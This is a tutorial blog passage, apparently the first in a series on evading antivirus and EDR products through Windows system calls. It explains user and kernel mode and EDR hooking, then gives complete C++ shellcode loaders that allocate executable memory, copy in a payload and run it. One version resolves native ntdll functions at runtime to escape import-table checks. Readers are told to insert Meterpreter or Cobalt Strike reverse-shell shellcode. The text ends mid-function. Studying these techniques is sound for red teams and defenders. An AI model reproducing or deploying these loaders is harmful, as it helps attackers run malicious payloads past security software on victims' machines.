Bob van der Staak

Summary

The provided web content is an in-depth exploration of techniques for bypassing antivirus and Endpoint Detection and Response (EDR) systems through the manipulation of system calls, particularly focusing on Windows system calls and the transition between user mode and kernel mode.

Abstract

The article delves into the intricacies of system calls within the Windows operating system, emphasizing their role in the execution of security-evading techniques. The author, who is new to the field, aims to demystify the process by starting with fundamental concepts such as the difference between user mode and kernel mode, and the significance of system calls as the interface between user-mode applications and kernel operations. The discussion progresses through the types of system calls, the structure of Windows API layers, and the potential for EDR hooking to detect malicious behavior. Practical code examples illustrate the use of high-level Windows APIs and native APIs to allocate memory and execute shellcode, while also touching on the importance of proper memory management and the potential for detection by EDRs. The article concludes with a commitment to further research into more advanced techniques, including direct syscalls, and the intention to share findings and documentation with the community.

Opinions

  • The author believes that understanding the basics of system calls and Windows API layers is crucial for developing effective EDR evasion techniques.
  • There is an opinion that while the techniques discussed may be detected by modern EDRs, the knowledge of these methods is valuable for foundational understanding and future research.
  • The author suggests that static analysis tools may not readily detect the use of native Windows APIs due to dynamic loading during runtime, which could potentially bypass certain EDR checks.
  • The article implies that the evolution of security measures, such as Microsoft's Kernel Patch Protection (KPP), has necessitated more sophisticated bypass techniques.
  • The author expresses a personal commitment to continued learning and sharing of knowledge within the information security community.

Exploring Antivirus and EDR evasion techniques step-by-step. Part 1

My learnings on how the different antivirus and EDR evasion techniques are used in the field.

Introduction

In this series, I will explore the techniques used in the field to bypass antivirus and EDR systems. I am new to this field, and the best way to start is to read, implement, and understand the subject instead of immediately going to the advanced techniques. I like to start at the beginning and take you with me in exploring the techniques currently used in the field. Therefore we will start with the Windows (native) APIs. Specifically, this blog goes into depth on three items:

  • Step 1: Introduction to system calls -> What are they used for, and what are user mode and kernel mode?
  • Step 2: High Level APIs -> How shellcode can be executed by making use of Windows APIs
  • Step 3: Medium Level APIs -> How shellcode can be executed by making use of Windows native APIs.

Note: the following techniques will be detected by almost all EDRs. This series will hopefully give better insight into the basics and the foundation of Windows. In the next chapters, we will dig deeper and deeper into the subject. In the end, I see it as an opportunity to share my experience and “research” with the community and to create some useful documentation for myself that I can reference in the future.

What is a System call?

Before we can explain how antivirus and EDRs could be evaded by making use of system calls, it is good to understand what a system call is.

In one sentence:

A system call is a programmatic instruction that allows a temporary transition from user mode to kernel mode.

Before we delve deeper, I think it is important to take a step back even further and understand what user mode and kernel mode mean.

But what are user mode and kernel mode, then?

A processor in a computer running Windows has two different modes: user mode and kernel mode.

The processor switches between the two modes depending on what type of code is running on the processor. Applications run in user mode, and core operating system components run in kernel mode. While many drivers run in kernel mode, some drivers may run in user mode.

User mode

When you start an application, Windows creates a process for the application. The process provides the application with a private virtual address space and a private handle table. Because an application’s virtual address space is private, one application can’t alter data that belongs to another application. Each application runs in isolation, and if an application crashes, the crash is limited to that one application. Other applications and the operating system aren’t affected by the crash.

In addition to being private, the virtual address space of a user-mode application is limited. A process running in user mode can’t access virtual addresses that are reserved for the operating system. Limiting the virtual address space of a user-mode application prevents the application from altering, and possibly damaging, critical operating system data.

Kernel mode

All code that runs in kernel mode shares a single virtual address space. Therefore, a kernel-mode driver isn’t isolated from other drivers and the operating system itself. If a kernel-mode driver accidentally writes to the wrong virtual address, data that belongs to the operating system or another driver could be compromised. If a kernel-mode driver crashes, the entire operating system crashes.

This diagram illustrates communication between user-mode and kernel-mode components.

Image from Microsoft showing the line between User Mode and kernel mode

The transition from user mode to kernel mode occurs when the application requests the help of the operating system or an interrupt or a system call occurs.

Process Monitor

We can get a view of this step by looking at Process Monitor. When we create a file in Notepad.exe and view the events, we see that KernelBase.dll performs a CreateFileW Windows API call (where the W stands for “wide character”, so it operates on Unicode (UTF-16) strings). This is followed by the native Windows function ZwCreateFile in ntdll.dll (the prefix can be Nt or Zw). Then execution goes into kernel mode with the system call, and ntoskrnl.exe actually creates the file.

And so we are back at the system call!

Types of System Calls

Where are system calls required? Broadly, there are five types of system calls. They are explained below, each with examples of Windows API functions that end up making such calls.

Process Control

These system calls deal with processes, such as process creation and process termination. (CreateProcess(), ExitProcess(), WaitForSingleObject())

File Management

These system calls are responsible for file manipulation, such as creating a file, reading a file, and writing to a file. (CreateFile(), ReadFile(), WriteFile(), CloseHandle())

Device Management

These system calls are responsible for device manipulation such as reading from device buffers, writing into device buffers etc. (SetConsoleMode(), ReadConsole(), WriteConsole())

Information Maintenance

These system calls handle information and its transfer between the operating system and the user program. (GetCurrentProcessId(), SetTimer(), Sleep())

Communication

These system calls are useful for interprocess communication. They also deal with creating and deleting a communication connection. (CreatePipe(),CreateFileMapping(),MapViewOfFile())

System calls are not wrapper functions

There is a very important distinction to make. In C/C++, when we want to copy some data into memory, we use the following piece of code:

 memcpy(exec, code, sizeof code);

This is not a system call. This is just the memcpy function, which is part of the C/C++ runtime library. It copies the bytes entirely in user mode and never needs to enter the kernel. memcpy is not defined within the kernel of the OS, unlike NtAllocateVirtualMemory, for example.

So in short:

A system call is a programmatic instruction that allows a temporary transition from user mode to kernel mode. System calls provide the interface between a process in user mode and the task to be executed in the kernel. They are required in situations such as accessing hardware devices, using network connections, and reading and writing files. There are five types of system calls: process control, file management, device management, information maintenance, and communication. For a user-mode application, system calls are the way to request services from the kernel.

Okay, now we know what a System call is and why it is used, but what does this have to do with EDR or antivirus evasion?

EDR Hooking

In this blog, I will not go into great detail about EDR hooking or how you can check whether your native APIs are hooked by a specific EDR (which is possible). But in short: API hooking is a technique used by many EDRs and AVs to monitor a process or code execution in real time for malicious behavior. The EDR places a jump instruction inside ntdll.dll at the start of each function it wants to hook. That jump redirects the flow of execution to the EDR's own code, where it can inspect the call and detect suspicious behavior.
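To make the idea of a hook more concrete, here is a minimal user-mode sketch. It is a toy model, not how a real EDR is built: a real hook overwrites the first instructions of the ntdll.dll stub with a jump, while this sketch simply swaps a function pointer. The names real_allocate, monitored_allocate, allocate_entry, and hook_log are hypothetical and exist only for this illustration.

```cpp
#include <cassert>
#include <cstddef>
#include <string>
#include <vector>

// Hypothetical stand-in for a native API stub. Not a real Windows function.
inline int real_allocate(std::size_t size, unsigned /*protect*/) {
    return size > 0 ? 0 : -1;  // 0 means success in this toy model
}

using AllocateFn = int (*)(std::size_t, unsigned);

// Every call goes through this pointer, playing the role of the stub entry.
inline AllocateFn& allocate_entry() {
    static AllocateFn entry = &real_allocate;
    return entry;
}

// Where the toy "EDR" records what it has seen.
inline std::vector<std::string>& hook_log() {
    static std::vector<std::string> log;
    return log;
}

constexpr unsigned kExecuteReadWrite = 0x40;  // value of PAGE_EXECUTE_READWRITE

// The hook: inspect the arguments first, then forward to the original.
inline int monitored_allocate(std::size_t size, unsigned protect) {
    if (protect == kExecuteReadWrite) {
        hook_log().push_back("RWX allocation of " + std::to_string(size) + " bytes");
    }
    return real_allocate(size, protect);
}

// Installing the hook redirects the entry point to the monitoring code.
inline void install_hook() {
    allocate_entry() = &monitored_allocate;
}
```

After install_hook(), a call such as allocate_entry()(16, kExecuteReadWrite) still succeeds, but it passes through monitored_allocate first. That is the position an EDR hook occupies.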

As a hacker / red teamer, it is important to find methods to bypass this. We don’t want our code to be analyzed by the EDR. Different methodologies exist to achieve that. In this series, I want to investigate a few of these techniques, and along the way we will probably discover many more possibilities.

Making use of native Windows API’s ==> Direct Syscalls ==> Indirect Syscalls ==> Patching.

In this blog, we start with the high-level Windows APIs and move on to the native Windows APIs. This EDR bypass would only work if the EDR hooks the high-level Windows API and not the native API, which is probably not the case. Still, it is good to have a broad understanding of the subject.

What does this look like in an image?

An image says more than 1000 words, so here is a summary in a single image:

Program where NtAllocateVirtualMemory function is hooked by an EDR.

This image shows what this looks like. Our high-level Windows API example calls VirtualAlloc, which is located in Kernel32.dll. This in turn references Kernelbase.dll, which is the successor of kernel32.dll. In essence, Kernel32.dll acts as a compatibility layer for older applications that rely on it, but many of its functions are redirected to their counterparts in kernelbase.dll. That is why both contain the VirtualAlloc function. VirtualAlloc then calls into ntdll.dll, where the function NtAllocateVirtualMemory is called. This is the native Windows API and, based on this image, a location where an EDR will probably place a hook to analyze the call. If the call is accepted, the system call is executed.

This will trigger a whole list of actions. An interesting read is the article from alice[.]clement-pommeret[.]red if you want more details (see resources below). In short, the syscall instruction saves the return address (in the RCX register) so that execution can resume in user mode after the syscall is completed, and it jumps to the address stored in the LSTAR register, which points to KiSystemCall64. KiSystemCall64 takes the syscall number passed from user mode and looks it up in the KiServiceTable to find the corresponding kernel function. This table is the System Service Dispatch Table or SSDT, which is conceptually a simple array of entries that each identify a kernel routine. When the entry is retrieved, the routine it identifies is executed.

Well, even an image requires some explanation! I hope it gives a bit more insight.
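The lookup step described above can be sketched as a table of function pointers indexed by a service number. This is a simplified user-mode model, not kernel code. The routine names and the indices 0 to 2 are made up for the illustration and are not real Windows syscall numbers.

```cpp
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>

// Signature shared by all toy "kernel routines" in this sketch.
using ServiceRoutine = std::int32_t (*)(std::uint64_t arg);

// Hypothetical routines. The return values only show which one ran.
inline std::int32_t svc_allocate(std::uint64_t) { return 100; }
inline std::int32_t svc_free(std::uint64_t)     { return 200; }
inline std::int32_t svc_close(std::uint64_t)    { return 300; }

// Toy dispatch table: slot N holds the routine for service number N.
inline const std::array<ServiceRoutine, 3>& service_table() {
    static const std::array<ServiceRoutine, 3> table = {{
        &svc_allocate, &svc_free, &svc_close
    }};
    return table;
}

constexpr std::int32_t kInvalidService = -1;

// Plays the role of the dispatcher: validate the number, look up the
// routine in the table, and call it.
inline std::int32_t dispatch(std::uint32_t number, std::uint64_t arg) {
    const auto& table = service_table();
    if (number >= table.size()) {
        return kInvalidService;  // unknown service number
    }
    return table[number](arg);
}
```

In this model, dispatch(0, 0) runs svc_allocate, and a number outside the table is rejected instead of being used as an index.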

Security Note:

In the past the SSDT could be patched (hooked) to hijack the kernel workflow. This was a way for an EDR or AV to perform analysis (like today with hooks in DLLs).

However, this is not possible anymore on 64-bit Windows. To prevent this kind of change, Microsoft introduced Kernel Patch Protection (KPP), also known as PatchGuard (PG). With KPP, any attempt to patch the SSDT or LSTAR will lead to a BSOD (blue screen of death).

Step 2 ==> High level Windows API

Now that we have a better understanding of syscalls and why we would want to investigate them, we can go a step further and start implementing. Again, to get a better understanding of the implementation, let's start with the classic approach of using the Windows APIs, which are provided by kernel32.dll and kernelbase.dll.

The code can be written in multiple languages. I will use a new C++ Project in Visual Studio. The code in question is quite small and is shown in the image below.

I already gave some explanation in the code, but let us review every line of code to get a better understanding of what we are doing.

The code below is the main part of the “evil code”. This is where the code for the reverse shell, or the code to create a local administrator account, will be located. It can be generated with tools like Meterpreter, Sliver, or Cobalt Strike. Generate the shellcode you like and place it in the code array. It will be used later in the code.

Note: This code doesn’t perform any encryption or further obfuscation of the given shellcode. In the future, we will look at other steps that can be taken to minimize the risk of detection, like basic XOR encryption or the use of AES encryption.

// The code array is the location where you store the Meterpreter shellcode  
unsigned char code[] = "\xa6\x12\xd9";

VirtualAlloc is a function in the Windows API that is used to allocate and manage virtual memory.

// Allocate memory the size of the shellcode. MEM_RESERVE | MEM_COMMIT
 // reserves the address range and commits it, so it is backed by physical
 // RAM or the page file. PAGE_EXECUTE_READWRITE allows the memory to be
 // executed, read, and written to.
 void* exec = VirtualAlloc(0, 
                           sizeof code,
                           MEM_RESERVE | MEM_COMMIT,
                           PAGE_EXECUTE_READWRITE);

Let's break down the function.

The first parameter is lpAddress. It specifies the starting address of the allocation. If we keep lpAddress zero, the system will determine a suitable address for the allocation. This is the way to go. Otherwise, we would have to specify the memory location ourselves, which is hard to do, especially on a target system.

The second parameter, sizeof code, specifies the size (in bytes) of the memory block to be allocated. The expression sizeof code is used to determine the size of the predefined shellcode in bytes.

The third parameter, MEM_RESERVE | MEM_COMMIT, indicates that the memory should be reserved and then committed. Committed memory is actually backed by the system's page file or physical RAM. I have also seen code that only uses MEM_COMMIT. Interestingly, according to the Microsoft documentation this is also “accepted” when lpAddress is NULL, and it will reserve the memory for you. But to be more precise, I will use MEM_RESERVE | MEM_COMMIT.
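One detail of sizeof code is easy to miss, so here is a small sketch. When an array is initialized from a string literal, the compiler appends a terminating '\0', and sizeof counts that byte too. The arrays below reuse the three-byte placeholder from this article. The names code_literal and code_bytes are only for this illustration.

```cpp
#include <cassert>
#include <cstddef>

// Initialized from a string literal: three bytes plus an implicit '\0'.
static const unsigned char code_literal[] = "\xa6\x12\xd9";

// Initialized from a brace list: exactly the three bytes that are listed.
static const unsigned char code_bytes[] = { 0xa6, 0x12, 0xd9 };

constexpr std::size_t literal_size = sizeof code_literal;  // counts the '\0'
constexpr std::size_t bytes_size   = sizeof code_bytes;    // no terminator

static_assert(literal_size == bytes_size + 1,
              "a string literal initializer adds one terminating byte");
```

So the size passed to VirtualAlloc and RtlCopyMemory in this article is one byte larger than the payload itself, which is harmless here but good to be aware of.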

Attempting to commit a specific address range by specifying MEM_COMMIT without MEM_RESERVE and a non-NULL lpAddress fails unless the entire range has already been reserved. The resulting error code is ERROR_INVALID_ADDRESS.

The fourth and last parameter, PAGE_EXECUTE_READWRITE, specifies the protection attributes for the allocated memory. This must be one of the memory protection constants, such as PAGE_READWRITE or PAGE_EXECUTE_READWRITE. In this case, the choice has been made to use PAGE_EXECUTE_READWRITE. Because of this, the memory is allowed to be executed and can also be read from and written to.

The following piece of code copies the provided shellcode (the second parameter) into the memory we just allocated (the first parameter). The number of bytes to copy is given by the third parameter, which is the size of the shellcode variable.

Note: A more common approach is the use of the function memcpy. However, this is a C / C++ function and not a Windows API function. Therefore we use the Windows name RtlCopyMemory. In user-mode code, the Windows headers define RtlCopyMemory as a macro around memcpy, so the behavior stays the same.
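As a small sketch of how these flag values behave: the allocation types are bit flags that are combined with |, while the protection values are separate constants of which one is chosen. The numeric values below match winnt.h, but they are redefined under hypothetical k-prefixed names so the snippet compiles without the Windows SDK.

```cpp
#include <cassert>
#include <cstdint>

// Allocation type flags (values as in winnt.h). These are combinable bits.
constexpr std::uint32_t kMemCommit  = 0x1000;  // MEM_COMMIT
constexpr std::uint32_t kMemReserve = 0x2000;  // MEM_RESERVE

// Memory protection constants (values as in winnt.h).
constexpr std::uint32_t kPageReadWrite        = 0x04;  // PAGE_READWRITE
constexpr std::uint32_t kPageExecute          = 0x10;  // PAGE_EXECUTE
constexpr std::uint32_t kPageExecuteReadWrite = 0x40;  // PAGE_EXECUTE_READWRITE

// The combined value that the call in this article passes as the third argument.
constexpr std::uint32_t reserve_and_commit() {
    return kMemReserve | kMemCommit;
}

// True when two constants have at least one bit in common.
constexpr bool shares_bits(std::uint32_t a, std::uint32_t b) {
    return (a & b) != 0;
}
```

Note that shares_bits(kPageExecuteReadWrite, kPageExecute) is false: PAGE_EXECUTE_READWRITE is its own constant and not PAGE_EXECUTE with extra bits, so a monitoring tool has to compare against the full value.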

// Copy the shellcode into the previously allocated memory.
 RtlCopyMemory(exec, code, sizeof code);

The last line of code is responsible for the execution of the code in memory.

// Treat exec as a function pointer and call it immediately. Because exec
 // points to the memory that contains our shellcode, this executes the code
 // stored at that address.
 ((void(*)())exec)();

((void(*)())exec)(): This line casts exec to a function pointer. exec points to a memory location that contains executable code, so by casting it to a function pointer and calling it, you are executing the code stored at that address. In other words, it executes the shellcode that we copied into the allocated memory!
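The cast itself can be tried safely with an ordinary function instead of shellcode. The sketch below stores the address of a harmless routine in a void* and calls it through the same kind of cast. The function names are hypothetical. Converting between void* and a function pointer is only conditionally supported by the C++ standard, but the mainstream compilers (MSVC, GCC, Clang) accept it.

```cpp
#include <cassert>

// Counts how often the routine ran, so the effect of the call is observable.
inline int& call_counter() {
    static int count = 0;
    return count;
}

// An ordinary, harmless function that stands in for "code at an address".
inline void harmless_routine() {
    ++call_counter();
}

// Returns the routine's address as an untyped pointer, like exec in the article.
inline void* address_of_routine() {
    return reinterpret_cast<void*>(&harmless_routine);
}

// Same idea as ((void(*)())exec)(): reinterpret the address as a function
// taking no arguments and returning nothing, then call it.
inline void call_through_void_pointer(void* address) {
    reinterpret_cast<void (*)()>(address)();
}
```

Calling call_through_void_pointer(address_of_routine()) runs harmless_routine once. The only difference in the article is that the address points at bytes copied into memory at runtime.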

TLDR

In summary, this code allocates a block of virtual memory with a size equal to the provided shellcode, copies the shellcode into that memory, and then immediately executes it.

#include <stdio.h>
#include <windows.h>
// The code array is the location where you store the Meterpreter shellcode  
unsigned char code[] = "\xa6\x12\xd9\xa6\x12\xd9\xa6\x12\xd9\xa6\x12\xd9\xa6\x12\xd9\xa6\x12\xd9\xa6\x12\xd9";


int main() {


 // Allocate memory the size of the shellcode. MEM_RESERVE | MEM_COMMIT
 // reserves the address range and commits it, so it is backed by physical
 // RAM or the page file. PAGE_EXECUTE_READWRITE allows the memory to be
 // executed, read, and written to.
 void* exec = VirtualAlloc(0, sizeof code, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);


 // Copy the shellcode into the previously allocated memory.
 RtlCopyMemory(exec, code, sizeof code);


 // Treat exec as a function pointer and call it immediately. Because exec
 // points to the memory that contains our shellcode, this executes the code
 // stored at that address.
 ((void(*)())exec)();
 return 0;

}

Step 3 ==> Native Windows API

The next step is to make use of the native API of Windows. This could potentially bypass an EDR or antivirus if it only hooks kernel32.dll, because this technique never passes through that hook. However, in this day and age, most AVs and EDRs will detect this technique. Still, it is good to know the first steps and the older techniques that were used.

Let us look at the code below which I will explain shortly:

#include <stdio.h>
#include <windows.h>
#include <winternl.h>

// Here we define a function pointer type that matches the signature of
// NtAllocateVirtualMemory. It is needed later to store the address of
// that function in a variable of the correct type.
typedef NTSTATUS(WINAPI* PNTALLOCATEVIRTUALMEMORY)(
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
    );

// The same as above only we specify the NtFreeVirtualMemory function pointer
typedef NTSTATUS(WINAPI* PNTFREEVIRTUALMEMORY)(
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    PSIZE_T RegionSize,
    ULONG FreeType
    );

int main() {

    // The code array is the location where you store the Meterpreter shellcode
    unsigned char code[] = "\xa6\x12\xd9...";


    // GetModuleHandleA returns a handle to ntdll.dll, which is already loaded
    // in every process. ntdll.dll contains many low-level Windows functions.
    // GetProcAddress then looks up the address of NtAllocateVirtualMemory,
    // the function we want to use to allocate memory in the next step.
    // Because the address is cast to our function pointer type, we can call
    // the NtAllocateVirtualMemory variable like a normal function.
    PNTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory =
        (PNTALLOCATEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");


    // Allocate the virtual memory. The status variable of type NTSTATUS tells
    // us whether the allocation succeeded (STATUS_SUCCESS means it did).
    // NtAllocateVirtualMemory is the function we retrieved in the previous
    // step. It is the native API function to allocate virtual memory within
    // a process. The main difference from the earlier example is
    // GetCurrentProcess, which returns a handle to the current process. The
    // memory is allocated in that process. exec receives the base address.
    // The other arguments are the same as in the previous example.
    void* exec = NULL;
    SIZE_T size = sizeof(code);
    NTSTATUS status = NtAllocateVirtualMemory(GetCurrentProcess(), &exec, 0, &size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);


    // Practically the same as memcpy. RtlCopyMemory is the Windows name for it
    // and not a C/C++ library function. It copies the provided shellcode into
    // the previously allocated memory.
    RtlCopyMemory(exec, code, sizeof code);


    // The same code as before. It executes the shellcode in memory.
    ((void(*)())exec)();


    // The same trick that retrieved NtAllocateVirtualMemory is used again,
    // but this time for NtFreeVirtualMemory. It is needed to give the memory
    // back to the system. Otherwise we leak memory, and an application that
    // keeps doing so will eventually exhaust its resources or run out of
    // available address space. So for proper memory management (which is our
    // own responsibility at this level) we free the region. We pass the
    // exec pointer (which points to the shellcode) again and specify
    // MEM_RELEASE to make sure the memory is released.
    PNTFREEVIRTUALMEMORY NtFreeVirtualMemory =
        (PNTFREEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtFreeVirtualMemory");
    SIZE_T regionSize = 0;
    status = NtFreeVirtualMemory(GetCurrentProcess(), &exec, &regionSize, MEM_RELEASE);

    return 0;
}

Let's break the individual pieces of code down.

Note: First, it is important to clarify that not all functions in this example are native Windows APIs. To make all of the code use native APIs, the same trick should be performed for the other functions as well. We will dive deeper into that when we get to direct syscalls. The native APIs would be:

  • NtAllocateVirtualMemory
  • NtWriteVirtualMemory
  • NtFreeVirtualMemory
  • NtCreateThreadEx
  • NtWaitForSingleObject
  • NtClose

// Here we define a function pointer type that matches the signature of
// NtAllocateVirtualMemory. It is needed later to store the address of
// that function in a variable of the correct type.
typedef NTSTATUS(WINAPI* PNTALLOCATEVIRTUALMEMORY)(
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
    );

// The same as above only we specify the NtFreeVirtualMemory function pointer
typedef NTSTATUS(WINAPI* PNTFREEVIRTUALMEMORY)(
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    PSIZE_T RegionSize,
    ULONG FreeType
    );

The code above creates two types, PNTALLOCATEVIRTUALMEMORY and PNTFREEVIRTUALMEMORY, which are both pointers to a function. The function that each one points to must have a specific signature, which is defined within the parentheses. Both match native Windows API functions, which we will use in the lines below.

// The code array is the location where you store the Meterpreter shellcode
    unsigned char code[] = "\xa6\x12\xd9...";

Same as before, the code array is where the shellcode is stored. This can be any code that you would like to execute.

// GetModuleHandleA returns a handle to ntdll.dll, which is already loaded
    // in every process. ntdll.dll contains many low-level Windows functions.
    // GetProcAddress then looks up the address of NtAllocateVirtualMemory,
    // the function we want to use to allocate memory in the next step.
    // Because the address is cast to our function pointer type, we can call
    // the NtAllocateVirtualMemory variable like a normal function.
    PNTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory =
        (PNTALLOCATEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");

The code above uses GetModuleHandleA to get a handle to ntdll.dll and then the GetProcAddress Windows API function to obtain the address of a function inside it. This DLL contains many low-level Windows functions. One of them is NtAllocateVirtualMemory, which is the function we want to use to allocate memory in the next step. Because the returned address is cast to the PNTALLOCATEVIRTUALMEMORY type, we can use the NtAllocateVirtualMemory variable as a function. This is where the function pointer type we defined earlier is used! Without that definition, the compiler wouldn’t know which arguments the function takes or what it returns.

// Allocate the virtual memory. The status variable of type NTSTATUS tells
    // us whether the allocation succeeded (STATUS_SUCCESS means it did).
    // NtAllocateVirtualMemory is the function we retrieved in the previous
    // step. It is the native API function to allocate virtual memory within
    // a process. The main difference from the earlier example is
    // GetCurrentProcess, which returns a handle to the current process. The
    // memory is allocated in that process. exec receives the base address.
    // The other arguments are the same as in the previous example.
    void* exec = NULL;
    SIZE_T size = sizeof(code);
    NTSTATUS status = NtAllocateVirtualMemory(GetCurrentProcess(), &exec, 0, &size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

The code above is responsible for the memory allocation, the same as with VirtualAlloc. The important difference is that VirtualAlloc is the documented high-level wrapper, whereas NtAllocateVirtualMemory is the native function in ntdll.dll that VirtualAlloc itself ends up calling, and which issues the system call into kernel mode. In both cases the memory is allocated in the user-mode address space of the process. So, as discussed at the beginning, we are now one layer deeper in the OS. Kernel-mode drivers use the closely related ZwAllocateVirtualMemory routine.

Let's check the different aspects.

The return value is stored in an NTSTATUS variable. This can be used to validate whether the allocation of the memory was successful. If it was, the status will be STATUS_SUCCESS. However, I do not verify that in this code example.

The first argument passed to NtAllocateVirtualMemory comes from the GetCurrentProcess function. This is a Windows API function that returns a (pseudo) handle to the current process. It represents the running process in which the code is executing.
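Since the example does not check the status, here is a minimal sketch of what such a check looks like. It mirrors the NT_SUCCESS macro from the Windows headers, which treats every non-negative NTSTATUS value as success. The type alias NtStatus and the k-prefixed constants are hypothetical stand-ins so the snippet compiles without the Windows SDK. The numeric values are the documented ones.

```cpp
#include <cassert>
#include <cstdint>

// NTSTATUS is a signed 32-bit value on Windows. This alias stands in for it.
using NtStatus = std::int32_t;

constexpr NtStatus kStatusSuccess = 0x00000000;  // STATUS_SUCCESS
constexpr NtStatus kStatusInvalidParameter =
    static_cast<NtStatus>(0xC000000Du);          // STATUS_INVALID_PARAMETER

// Same rule as the NT_SUCCESS macro: success and informational codes are
// non-negative, while warning and error codes have the top bit set.
constexpr bool nt_success(NtStatus status) {
    return status >= 0;
}
```

In the article's code, the equivalent check would be to test status with NT_SUCCESS right after the NtAllocateVirtualMemory call and stop if it fails, instead of copying into a NULL pointer.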

These are the parameters passed to NtAllocateVirtualMemory:

  • &exec is a pointer to a variable that receives the starting address of the allocated memory region. The variable is set to NULL beforehand, which indicates that the system should choose a suitable address.
  • 0 is the ZeroBits argument. It specifies how many high-order bits of the base address must be zero. Setting it to 0 places no such restriction on the address.
  • &size is a pointer to a variable that specifies the size of the memory region to be allocated. This should be the size of the shellcode we want to place in the memory. On return, it contains the actual size of the region, rounded up to a whole number of pages.

MEM_RESERVE | MEM_COMMIT: This indicates that the memory should be reserved and then committed. Committed memory is actually backed by the system's page file or physical RAM. I have also seen code that only uses MEM_COMMIT. Interestingly, according to the Microsoft documentation for VirtualAlloc this is also “accepted”, and it will reserve the memory for you. But to be more precise, I will use MEM_RESERVE | MEM_COMMIT.
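The size variable is both an input and an output: the region that is actually allocated is rounded up to a whole number of pages, and the rounded value is written back. The sketch below shows only that rounding arithmetic. It assumes a 4096-byte page, which is typical on x86/x64 but should be queried (for example with GetSystemInfo) in real code. The names are hypothetical.

```cpp
#include <cassert>
#include <cstddef>

// Assumption for this sketch: 4 KiB pages, the usual size on x86/x64.
constexpr std::size_t kAssumedPageSize = 4096;

// Rounds size up to the next multiple of page (page must be non-zero).
constexpr std::size_t round_up_to_page(std::size_t size,
                                       std::size_t page = kAssumedPageSize) {
    return (size + page - 1) / page * page;
}
```

Under that assumption, a request for a handful of bytes, like the placeholder shellcode in this article, comes back as a region of 4096 bytes.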

PAGE_EXECUTE_READWRITE: This is a memory protection constant that specifies the protection level for the allocated memory. PAGE_EXECUTE_READWRITE indicates that the memory can be both executed (used for code) and read/written (used for data).

As we can see it is almost the same as the VirtualAlloc function!

 // Practically the same as memcpy. RtlCopyMemory is the Windows name for it
    // and not a C/C++ library function. It copies the provided shellcode into
    // the previously allocated memory.
    RtlCopyMemory(exec, code, sizeof code);

This code stayed the same and is responsible for copying the shellcode into the allocated memory.

   // The same code as before. It executes the shellcode in memory.
    ((void(*)())exec)();

This code is the same as before. For an explanation, see the earlier segment :)

    // The same trick that retrieved NtAllocateVirtualMemory is used again,
    // but this time for NtFreeVirtualMemory. It is needed to give the memory
    // back to the system. Otherwise we leak memory, and an application that
    // keeps doing so will eventually exhaust its resources or run out of
    // available address space. So for proper memory management (which is our
    // own responsibility at this level) we free the region. We pass the
    // exec pointer (which points to the shellcode) again and specify
    // MEM_RELEASE to make sure the memory is released.
    PNTFREEVIRTUALMEMORY NtFreeVirtualMemory =
        (PNTFREEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtFreeVirtualMemory");
    SIZE_T regionSize = 0;
    status = NtFreeVirtualMemory(GetCurrentProcess(), &exec, &regionSize, MEM_RELEASE);

This part is new. At this level, it is important to clean up after ourselves. We are required to perform some memory management. Otherwise, memory leaks could arise, which could lead to resource exhaustion. Let's check the code:

The first part of the code works the same way as for NtAllocateVirtualMemory. It retrieves the function address from ntdll.dll, except this time it is the address of the NtFreeVirtualMemory function, and stores it in the NtFreeVirtualMemory variable.

The next bit calls NtFreeVirtualMemory with a handle to the same (current) process and a pointer to exec, which identifies the memory we want to release. With MEM_RELEASE and a region size of 0, the entire region is released back to the system.

In the end, it is practically the same, but a few more steps are required to perform the same action.

Verification

Okay, now that we have gone through the code, it is also important to perform some verification and visualize what changed between the two implementations. This helps to better understand the differences.

One of the tools I used for verification is Microsoft's dumpbin utility. It comes installed with the Build Tools for C++ and can be accessed easily through the Developer Command Prompt of Visual Studio. It is used for examining the contents of binaries like EXEs or DLLs. With it, you can view the imported functions that are referenced by the specified executable.

This can be performed with the following command:

dumpbin /imports

In the following image, I show the imports of a standard hello world program in C++. (I only show the Kernel32.dll imports. There are more imports.)

Imports Kernel32.dll helloworld program

As you can see, by default there are already quite a few functions that are imported. If we compare that to the imports of our high-level API program, there are some additions.

High level API dumpbin results

We see that VirtualAlloc is imported into the application. This can be a red flag that makes AVs or EDRs perform further analysis on the executable. If we look a bit further, we also see that VCRUNTIME140.dll is imported, which apparently provides the memcpy function that we used in our code!

If we look at the native Windows API version, VirtualAlloc no longer shows up among the kernel32.dll imports. So if that was what an EDR or antivirus checked for, this would bypass it! However, there are some other imports. In the code we used GetModuleHandleA and GetProcAddress. Both are imported from Kernel32.dll, so these imports alone are a strong indication that functions from some other DLL are resolved at runtime.

Interestingly, if we look through the imports we don't see any reference to ntdll.dll or to NtAllocateVirtualMemory and NtFreeVirtualMemory. This is because dumpbin /imports only lists statically imported functions, which are known at build time. Because we resolved these two functions dynamically at runtime with GetProcAddress, they aren't visible in this view! So dynamically resolving the two functions makes static analysis a bit harder (of course, they can still be found with other tools like Ghidra).
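Harder does not mean invisible. The names handed to GetProcAddress are ordinary string literals, so unless they are obfuscated they still sit somewhere in the binary as plain ASCII. The following is a minimal sketch in portable C of the kind of byte scan a static analysis tool could do to find them. The helper names buffer_contains and file_contains are hypothetical, and reading the whole file into memory is a simplification that is fine for small executables.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Returns 1 if the bytes of `needle` occur anywhere in buf[0..len), else 0.
   An empty needle is reported as not found. */
int buffer_contains(const unsigned char *buf, size_t len, const char *needle)
{
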